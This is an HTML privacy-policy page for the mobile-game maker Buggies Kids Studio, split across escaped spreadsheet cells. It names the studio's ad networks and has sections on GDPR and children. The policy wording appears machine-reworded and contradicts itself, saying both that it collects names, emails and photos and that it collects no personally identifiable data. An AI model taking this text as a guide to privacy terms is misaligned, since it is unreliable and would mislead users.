&lt;html lang="en"&gt;_x005F_x000D_
_x005F_x000D_
&lt;head&gt;_x005F_x000D_
    &lt;!-- Title of The Page --&gt;_x005F_x000D_
    &lt;title&gt;Buggies Kids Studio&lt;/title&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Meta Informations --&gt;_x005F_x000D_
    &lt;meta charset="utf-8"&gt;_x005F_x000D_
    &lt;meta name="description" content="Bootstrap Responsive LiteApp - Software &amp; Landing Template"&gt;_x005F_x000D_
    &lt;meta name="keywords" content="LiteApp, template, bootstrap 4, ui template kit, envato templates, app html templates, html, css"&gt;_x005F_x000D_
    &lt;meta name="author" content="LiteApp - Software &amp; Landing Template"&gt;_x005F_x000D_
    &lt;meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0"&gt;_x005F_x000D_
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t>Favicon --&gt;_x005F_x000D_
    &lt;link rel="icon" href="images/favicon.png" type="image/x-icon"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Bootstrap Version 4.4.1 Minified CSS --&gt;_x005F_x000D_
    &lt;link type="text/css" rel="stylesheet" href="css/bootstrap.min.css"&gt;_x005F_x000D_
    &lt;!-- Font-Family CSS --&gt;_x005F_x000D_
    &lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css2?family=Roboto:wght@100;300;400;500;700;900&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
    &lt;!-- OwlCarousel CSS --&gt;_x005F_x000D_
    &lt;link type="text/css" rel="stylesheet" href="css/owl.carousel.min.css"&gt;_x005F_x000D_
    &lt;!-- FontAwesome CSS --&gt;_x005F_x000D_
    &lt;link type="text/css" rel="stylesheet" href="css/font-awsome.css"&gt;_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t>Animate CSS --&gt;_x005F_x000D_
    &lt;link type="text/css" rel="stylesheet" href="css/animate.css"&gt;_x005F_x000D_
    &lt;!-- Customized Style CSS --&gt;_x005F_x000D_
    &lt;link type="text/css" rel="stylesheet" href="css/styles.css"&gt;_x005F_x000D_
    &lt;!-- Responsive CSS --&gt;_x005F_x000D_
    &lt;link type="text/css" rel="stylesheet" href="css/responsive.css"&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
&lt;body&gt;_x005F_x000D_
    &lt;!-- Preloader STARTS Here --&gt;_x005F_x000D_
    &lt;div class="preloader" id="preloader"&gt;_x005F_x000D_
        &lt;div class="loader-logo"&gt;&lt;/div&gt;_x005F_x000D_
        &lt;div class="loading" id="loading"&gt;&lt;/div&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
    &lt;!-- Preloader ENDS Here --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t>Header STARTS Here --&gt;_x005F_x000D_
    &lt;header&gt;_x005F_x000D_
        &lt;!-- Navbar STARTS Here --&gt;_x005F_x000D_
        &lt;nav class="navbar navbar-expand-lg navbar-light" data-toggle="sticky-onscroll"&gt;_x005F_x000D_
            &lt;div class="container"&gt;_x005F_x000D_
                &lt;a class="brand" href="index.html"&gt;&lt;img src="images\photos\Layer 1.png" alt="logo" class="img-fluid" /&gt; &lt;/a&gt;_x005F_x000D_
                &lt;button class="navbar-toggler toggler ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation"&gt;_x005F_x000D_
                    &lt;span class="before-menu"&gt;&lt;i class="fad fa-bars"&gt;&lt;/i&gt;&lt;/span&gt;_x005F_x000D_
                    &lt;span class="after-menu"&gt;&lt;i class="fad fa-times"&gt;&lt;/i&gt;&lt;/span&gt;_x005F_x000D_
                &lt;/button&gt;_x005F_x000D_
                &lt;div class="collapse navbar-collapse position-lg-relative" id="navbarNav"&gt;_x005F_x000D_
                    &lt;ul class="navbar-nav ml-auto"&gt;_x005F_x000D_
                        &lt;li class="nav-item"&gt;_x005F_x000D_
                            &lt;a class="nav-link" href="index.html"&gt;Home&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li class="nav-item dropdown"&gt;_x005F_x000D_
                            &lt;a class="nav-link dropdown-toggle" href="javascript:void(0)" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"&gt;_x005F_x000D_
                                About_x005F_x000D_
                             &lt;/a&gt;_x005F_x000D_
                            &lt;div class="dropdown-menu" aria-labelledby="navbarDropdown"&gt;_x005F_x000D_
                                &lt;!</t>
  </si>
  <si>
    <t>----_x005F_x000D_
                                &lt;a class="dropdown-item drop-link" href="about.html"&gt;About us&lt;/a&gt;_x005F_x000D_
                                --&gt;_x005F_x000D_
                                &lt;a class="dropdown-item drop-link" href="team.html"&gt;Team&lt;/a&gt;_x005F_x000D_
                                &lt;a class="dropdown-item drop-link" href="privacy.html"&gt;Priavcy Policy&lt;/a&gt;_x005F_x000D_
                               &lt;!---- _ x000D_
                                &lt;a class="dropdown-item drop-link" href="faq.html"&gt;FAQ&lt;/a&gt;_x005F_x000D_
                            --&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li class="nav-item"&gt;_x005F_x000D_
                            &lt;a class="nav-link" href="career.html"&gt;Career&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;! ----_x005F_x000D_
                        &lt;li class="nav-item"&gt;_x005F_x000D_
                            &lt;a class="nav-link" href="blog.html"&gt;Blog&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                    --&gt;_x005F_x000D_
                        &lt;li class="nav-item"&gt;_x005F_x000D_
                            &lt;a class="nav-link" href="contact.html"&gt;Contact&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                    &lt;/ul&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/nav&gt;_x005F_x000D_
        &lt;!--</t>
  </si>
  <si>
    <t>Navbar ENDS Here --&gt;_x005F_x000D_
    &lt;/header&gt;_x005F_x000D_
    &lt;!-- Header ENDS Here --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Page Banner Section STARTS Here --&gt;_x005F_x000D_
    &lt;section class="app-page-banner"&gt;_x005F_x000D_
        &lt;div class="container"&gt;_x005F_x000D_
            &lt;div class="app-page-content"&gt;_x005F_x000D_
                &lt;div class="d-flex align-items-center"&gt;_x005F_x000D_
                    &lt;div&gt;_x005F_x000D_
                        &lt;h1&gt;Privacy Policy&lt;/h1&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                    &lt;div&gt;_x005F_x000D_
                        &lt;i class="fad fa-angle-double-down"&gt;&lt;/i&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                &lt;nav aria-label="app-breadcrumb"&gt;_x005F_x000D_
                    &lt;ol class="app-breadcrumb"&gt;_x005F_x000D_
                        &lt;li class="app-breadcrumb-item"&gt;&lt;a</t>
  </si>
  <si>
    <t>href="index.html"&gt;Home&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                        &lt;li class="app-breadcrumb-item active" aria-current="page"&gt;Privacy Policy&lt;/li&gt;_x005F_x000D_
                    &lt;/ol&gt;_x005F_x000D_
                &lt;/nav&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/section&gt;_x005F_x000D_
    &lt;!-- Page Banner Section ENDS Here --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Privacy Policy Section STARTS Here --&gt;_x005F_x000D_
    &lt;section class="app-priacy"&gt;_x005F_x000D_
        &lt;div class="container"&gt;_x005F_x000D_
            &lt;!--</t>
  </si>
  <si>
    <t>Page Section Main Title STARTS Here --&gt;_x005F_x000D_
            &lt;div class="row"&gt;_x005F_x000D_
                &lt; div class="col-12 text-center app-cst-margin"&gt;_x005F_x000D_
                    &lt;h2 class="app-page-section-title"&gt;Privacy Policy&lt;/h2&gt;_x005F_x000D_
                    &lt;p class="app-page-section-subtitle"&gt;&lt;/p&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;!-- Page Section Main Title ENDS Here --&gt;_x005F_x000D_
            &lt;div class="row"&gt;_x005F_x000D_
                &lt;div class="col-12"&gt;_x005F_x000D_
                    &lt;!--</t>
  </si>
  <si>
    <t>Privacy Policy Text Conatiner Card --&gt;_x005F_x000D_
                    &lt;div class="app-privacy-card"&gt;_x005F_x000D_
                        &lt;!-- User License --&gt;_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt;01. OUR FIRST PRIORITY IS TO SECURE YOUR PRIVACY:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt;</t>
  </si>
  <si>
    <t>OUR FIRST PRIORITY IS TO SECURE YOUR PRIVACY: We at Buggies Kids Studio are completely dedicated to ensuring the security freedoms of our clients. This Privacy Policy Document characterizes the ways we gather, use, oversee or store client information including individual data (assuming any).</t>
  </si>
  <si>
    <t>this information can be given by the client in any way while playing our versatile games on either Google Play Store, Amazon, or iOS App Store. The scope of this Policy is limited to Information received or collected by Buggies Kids Studio via any of our Services you used.&lt;/p&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        &lt;!-- User License --&gt;_x005F_x000D_
                        &lt;!--</t>
  </si>
  <si>
    <t>How do we use your information --&gt;_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt;02.  COLLECTION OF INFORMATION:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt; This is how Buggies Kids Studio can collect your information: We get specific data when you give it to us: for instance, on the off chance that you arrange your record profile, partake in a conversation board, you might give your name, email address, your date of birth, photo, and a rundown of interests, for example, your favorite music and network shows. A portion of that data can be utilized by Buggies Kids Studio to recognize or reach you straightforwardly and is now and then alluded to as by and by recognizable data.</t>
  </si>
  <si>
    <t>Buggies Kids Studio likewise assembles non-actually recognizable data from Users of our Services. Non-actually recognizable data is data that generally can't without help from anyone else be utilized to distinguish a specific individual or element, and may include: the Internet Protocol (IP) address, remarkable gadget identifiers, mysterious IDs for promoting, working framework, portable organization data, program type, existing applications, perusing action and non-exact gadget area data (e.g., city or locale).&lt;/p&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt;LOCATION&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt; Depending upon the supplier, we may naturally get general area data when you utilize our Services.</t>
  </si>
  <si>
    <t>We might utilize and store this data to give upgraded area based Services just as to serve area designated promoting without your express select in, which incorporates correspondence to outsider Services suppliers who have concurred with Buggies Kids Studio to keep such data classified and just utilize such data to the degree important to play out the Services as needed by Buggies Kids Studio. &lt;/p&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        &lt;!-- How do we use your information --&gt;_x005F_x000D_
                        &lt;!--</t>
  </si>
  <si>
    <t>How do we protect your information --&gt;_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt;03. How does Buggies Kids Studio Use your information?&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt;Buggies Kids Studio reserves the right to use and disclose the collected non-personal data for purpose of advertising by Buggies Kids Studio may employ third-party ad serving technologies that use certain methods to collect information for the purpose of interest-based ads serving._x005F_x000D_
                                     Please read the privacy of ad networks we are using in our games._x005F_x000D_
                                    &lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
                                &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
_ x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt; We develop our games using unity 3d and use unity ad network:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt;&lt;a target="blank" href="https://unity3d.com/legal/privacy-policy"&gt;_x005F_x000D_
                                    &lt;u style="color:blue;"&gt;_x005F_x000D_
                                        https://unity3d.com/legal/privacy-policy&lt;/u&gt;&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
                                &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt;</t>
  </si>
  <si>
    <t>We use google services and admob in our games:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt;&lt;a target="blank" href="https://policies.google.com/privacy?hl=en&amp;gl=US"&gt;_x005F_x000D_
                                    &lt;u style="color:blue;"&gt;_x005F_x000D_
                                        https://policies.google.com/privacy?hl=en&amp;gl=US&lt;/u&gt;&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
                                &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt; Chartboost ads:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt;&lt;a target="blank" href="https://answers.chartboost.com/en-us/articles/200780269"&gt;_x005F_x000D_
                                    &lt;u style="color:blue;"&gt;_x005F_x000D_
                                    https://answers.chartboost.com/en-us/articles/200780269&lt;/u&gt;&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
                                &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt; Vungle ads network:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt;&lt;a target="blank" href="https://vungle.com/privacy/"&gt;_x005F_x000D_
                                    &lt;u style="color:blue;"&gt;_x005F_x000D_
                                    https://vungle.com/privacy/&lt;/u&gt;&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
                                &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;!--</t>
  </si>
  <si>
    <t>How do we protect your information --&gt;_x005F_x000D_
                        &lt;!-- Do we use cache --&gt;_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt; GDPR:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt; According to GDPR the users of EU/UK will be notified to allow the ads network to gather the personal information to serve the interest based and location-based advertisement.</t>
  </si>
  <si>
    <t>If the user in that particular area does not allow the access to personal information, he will be receiving non-interest-based ads._x005F_x000D_
                                &lt;/p&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        &lt;!-- Do we use cache --&gt;_x005F_x000D_
                        &lt;!-- We use cache to --&gt;_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt;​DISCLOSURES OF INFORMATION:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt;We at Buggies Kids Studio don’t collect and store personally identifiable information in any way, our third-party service providers like ads networks may collect and store the information.</t>
  </si>
  <si>
    <t>This document displays the privacy policy of all third-party services we are using in our games, you can contact them for any content change or information removal.&lt;/p&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        &lt;!-- We use cache to --&gt;_x005F_x000D_
                        &lt;!-- Third-party disclosure --&gt;_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt;SECURITY:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt;</t>
  </si>
  <si>
    <t>We use reasonable electronic, personnel, and physical measures to protect information from loss, theft, alteration, or misuse. However, please be advised that even the best security measures cannot fully eliminate all risks. We cannot guarantee that only authorized persons will view your information.</t>
  </si>
  <si>
    <t>We are not responsible for third party circumvention of any privacy settings or security measures.&lt;/p&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        &lt;!-- Third-party disclosure --&gt;_x005F_x000D_
                        &lt;!-- Limitations --&gt;_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt;CHILDREN:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt;</t>
  </si>
  <si>
    <t>We do not knowingly collect or store personally identifiable information from anyone under the age of 13 unless or except as permitted by law. If we are made aware that we have received personally identifiable information from someone under 13, Buggies Kids Studio will use reasonable efforts to remove that information from our records.&lt;/p&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
                        &lt;div class="app-privacy-section"&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-header"&gt;_x005F_x000D_
                                &lt;h3&gt;PRIVACY POLICY CHANGES:&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-page-divider"&gt;&lt;/div&gt;_x005F_x000D_
                            &lt;div class="app-privacy-section-content"&gt;_x005F_x000D_
                                &lt;p&gt; Buggies Kids Studio may, in its sole discretion, change this Privacy Policy from time to time. Any and all changes to Buggies Kids Studio Privacy Policy will be reflected here and the date new versions are posted will be stated at the top of this Privacy Policy.&lt;/p&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        &lt;!--</t>
  </si>
  <si>
    <t>Limitations --&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                    &lt;!-- Privacy Policy Text Conatiner Card --&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/section&gt;_x005F_x000D_
    &lt;!-- Privacy Policy Section ENDS Here --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t>To Top Button --&gt;_x005F_x000D_
    &lt;div class="container"&gt;_x005F_x000D_
        &lt;div class="toTop" id="toTop"&gt;_x005F_x000D_
            &lt;a href="javascript:void(0)"&gt;&lt;i class="fad fa-angle-up"&gt;&lt;/i&gt;&lt;/a&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
    &lt;!-- To Top Button --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Quick Contact Section --&gt;_x005F_x000D_
    &lt;section class="app-index-contact"&gt;_x005F_x000D_
        &lt;div class="container"&gt;_x005F_x000D_
            &lt;div class="row"&gt;_x005F_x000D_
                &lt;div class="col-12"&gt;_x005F_x000D_
                    &lt;div class="position-relative"&gt;_x005F_x000D_
                        &lt;div class="app-index-contact-card"&gt;_x005F_x000D_
                            &lt;div&gt;_x005F_x000D_
                                &lt;h3&gt;Have any queries?</t>
  </si>
  <si>
    <t>&lt;br&gt; Feel free to ask.&lt;/h3&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                            &lt;div&gt;_x005F_x000D_
                                &lt;a href="contact.html" class="app-index-contact-btn"&gt;_x005F_x000D_
                                    Contact Us_x005F_x000D_
                                &lt;/a&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/section&gt;_x005F_x000D_
    &lt;!-- Quick Contact Section --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!-- Footer STARTS Here --&gt;_x005F_x000D_
    &lt;footer&gt;_x005F_x000D_
        &lt;div class="container"&gt;_x005F_x000D_
            &lt;!--</t>
  </si>
  <si>
    <t>Footer Logo &amp; Text --&gt;_x005F_x000D_
            &lt;div class="col-12 text-center"&gt;_x005F_x000D_
                &lt;div class="footer-brand"&gt;_x005F_x000D_
                    &lt;a href="index.html"&gt;&lt;img src="images\photos\Layer 1.png" alt="logo" /&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                &lt;div class="app-footer-contant-text-wrapper"&gt;_x005F_x000D_
                     &lt;h3&gt;Visit Us&lt;/h3&gt;_x005F_x000D_
                    &lt;p class="app-footer-text"&gt;Visit us on Play Store to make your life thrill-filled with _x005F_x000D_
                        our mobile games._x005F_x000D_
                    &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;!-- Footer Logo &amp; Text --&gt;_x005F_x000D_
            &lt;!-- Footer App Download Link --&gt;_x005F_x000D_
            &lt;div class="col-12"&gt;_x005F_x000D_
                &lt;div class="app-footer-download-card text-center"&gt;_x005F_x000D_
                    &lt;p class="app-footer-head"&gt;&lt;strong&gt;&lt;a target="blank" href="https://play.google.com/store/apps/dev?id=4824438668789534923"&gt;Get Our Games Now&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;! ----_x005F_x000D_
                    &lt;div class="row"&gt;_x005F_x000D_
                        &lt;!--</t>
  </si>
  <si>
    <t>Play Store App Download Link --_x005F_x000D_
                        &lt;div class="col-md-4"&gt;_x005F_x000D_
                            &lt;a href="javascript:void(0)" class="app-footer-store-btn"&gt;_x005F_x000D_
                                &lt;i class="fab fa-google-play"&gt;&lt;/i&gt; ANDROID_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        ---&gt;_x005F_x000D_
                        &lt;!--</t>
  </si>
  <si>
    <t>Play Store App Download Link --&gt;_x005F_x000D_
                        &lt;!-- App Store App Download Link --_x005F_x000D_
                        &lt;div class="col-md-4"&gt;_x005F_x000D_
                            &lt;a href="javascript:void(0)" class="app-footer-store-btn"&gt;_x005F_x000D_
                                &lt;i class="fab</t>
  </si>
  <si>
    <t>fa-apple"&gt;&lt;/i&gt; IPHONE_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        &lt;!-- App Store App Download Link --&gt;_x005F_x000D_
                        &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Windows Store App Download Link --_x005F_x000D_
                        &lt;div class="col-md-4"&gt;_x005F_x000D_
                            &lt;a href="javascript:void(0)" class="app-footer-store-btn m-0"&gt;_x005F_x000D_
                                &lt;i class="fab fa-windows"&gt;&lt;/i&gt; WINDOWS_x005F_x000D_
                            &lt;/a&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                        &lt;!-- Windows Store App Download Link --&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            </t>
  </si>
  <si>
    <t>&lt;hr&gt;_x005F_x000D_
            &lt;!-- Footer App Download Link --&gt;_x005F_x000D_
            &lt;!-- Social Media Links --_x005F_x000D_
            &lt;div class="col-12"&gt;_x005F_x000D_
                &lt;div class="app-footer-social-links"&gt;_x005F_x000D_
                    &lt;p class="app-footer-head"&gt;&lt;strong&gt;Follow Us&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
                    &lt;ul&gt;_x005F_x000D_
                        &lt;li&gt;&lt;a href="javascript:void(0)"&gt;Facebook &lt;i class="fab</t>
  </si>
  <si>
    <t>fa-facebook-square"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                        &lt; li&gt;&lt;a href="javascript:void(0)"&gt;Twitter &lt;i class="fab fa-twitter"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;&lt;a href="javascript:void(0)"&gt;Instagram &lt;i class="fab fa-instagram"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;&lt;a href="javascript:void(0)"&gt;Linkedin &lt;i class="fab fa-linkedin"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                    &lt;/ul&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;!-- Social Media Links --&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
        &lt;div class="col-12"&gt;_x005F_x000D_
            &lt;div class="row"&gt;_x005F_x000D_
                &lt;!--</t>
  </si>
  <si>
    <t>Copyright Text --&gt;_x005F_x000D_
                &lt;div class="app-footer-copyright"&gt;_x005F_x000D_
                    &lt;label class="m-0"&gt;&lt;strong&gt;&amp;COPY;&lt;/strong&gt; 2021 &lt;span&gt;Buggies Kids Studio&lt;/span&gt; | All Rights Reserved&lt;/label&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                &lt;!-- Copyright Text --&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/footer&gt;_x005F_x000D_
    &lt;!-- Footer ENDS Here --&gt;_x005F_x000D_
_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t>JQuery JavaScript File --&gt;_x005F_x000D_
    &lt;script src="js/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;!-- Bootstrap Bundle JavaScript File --&gt;_x005F_x000D_
    &lt;script src="js/bootstrap.bundle.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;!-- Owl Carousel JavaScript File --&gt;_x005F_x000D_
    &lt;script src="js/owl.carousel.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Wow Animation JavaScript File --&gt;_x005F_x000D_
    &lt;script src="js/wow.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;!-- Smooth Scroll JavaScript File --&gt;_x005F_x000D_
    &lt;script src="js/smoothscroll.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;!-- Customized JavaScript File --&gt;_x005F_x000D_
    &lt;script src="js/custom.js"&gt;&lt;/script&gt;_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
